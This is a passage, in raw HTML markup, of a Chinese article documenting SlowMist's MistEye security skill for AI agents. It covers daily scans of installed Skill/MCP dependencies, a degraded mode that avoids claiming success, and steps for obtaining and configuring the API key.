[]"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">已安装 Skill/MCP 依赖巡检</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：递归扫描所有已安装技能的依赖声明文件，执行全量检测</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">新版本通知</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：若发现新版本，提醒用户更新</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">6.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">巡检摘要输出</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：汇总当日巡检结果</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">创建巡检任务:</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.49372862029646525" data-type="png" data-w="877" height="208" style="margin-left: 0px;margin-top: 0px;" width="421" data-imgfileid="100021242" src="https://wechat2rss.xlab.app/img-proxy/?k=1d2d395c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCL1bZ5q0ibebiact2V5QaKOknvXkCic61lic5M45ZK5eE16c3xqMicteEvH9sCKOsbb6Pk12LvBO10ibEkVCWZI2uESedAaWX6DvP7XE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检测结果:</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.5028506271379704" data-type="png" data-w="877" height="212" style="margin-left: 0px;margin-top: 0px;" width="421" data-imgfileid="100021243" src="https://wechat2rss.xlab.app/img-proxy/?k=cb5b4c13&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLO3GJvexEz60ITgNgjCYKJdCv0fypgQmNibuSKhf0CA1rvlps9ZflgH7xCyQKPQY7ibm5ibfh3qlzhsicFDdJeReERPibdObVEZX8Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4.2 降级模式</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">当网络受限或 API 密钥不可用时，系统进入</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">降级模式(degraded)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：仅执行本地文件统计，标记结果为 degraded，不声明检测成功。这确保了即使在受限环境中，也不会因为&#34;假阴性&#34;而给用户带来虚假的安全感。</span></span></b></p><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 4pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">五、部署与接入</span></span></b></h2><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.1 获取 Skill</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">官方仓库地址：<a href="https://github.com/slowmist/misteye-skills" target="_blank">https://github.com/slowmist/misteye-skills</a></span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.2 获取 API 密钥</span></span></b></h3><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye API 密钥通过以下步骤</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">免费获取</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">访问</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">app.misteye.io/api-keys</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">免费注册</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">账号后，即可</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">免费创建</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> API Key</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">复制生成的 API Key，按下一节的方式配置到本地即可使用</span></span></p></b><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">注册和创建 API Key </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完全免费</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，无需绑定支付方式。API 详情文档见 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">app.misteye.io/api-docs</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.068359375" data-type="png" data-w="2048" height="140" style="margin-left: 0px;margin-top: 0px;" width="2048" data-imgfileid="100021261" src="https://wechat2rss.xlab.app/img-proxy/?k=31208a2e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLwP2P0TgCCgevPCXEKLickz0QFpxkmgW1sVefZ8tuRWFf4HRqsoD0lZJzCObGwZlPVukiclhBPC0BibFaJ4IOVezv69jRkClfydI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p></b></b><b style="font-weight:normal;" data-pm-slice="0 0 []"><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.3 配置 API 密钥</span></span></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">获取 API Key 后，通过以下优先级配置到本地，MistEye 会自动读取：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 环境变量 MISTEYE_API_KEY</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件 $MISTEYE_CONFIG_DIR/api_key</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件 ~/.config/misteye/api_key（文件权限要求 600）</span></span></p><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全提醒</span></span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：API 密钥不应硬编码在任何项目文件中，也不应提交到版本控制系统。</span></span></span></b></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.4 验证安装</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安装完成后，MistEye 会触发安装后提醒，建议用户开启每日自动化巡检：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">首次安装已完成。建议开启主动巡检：默认推荐每天一次。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">巡检将首先检查 <a href="https://github.com/slowmist/misteye-skills" target="_blank">https://github.com/slowmist/misteye-skills</a> 是否有新版本；如果存在更新，会在继续巡检前提示。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: 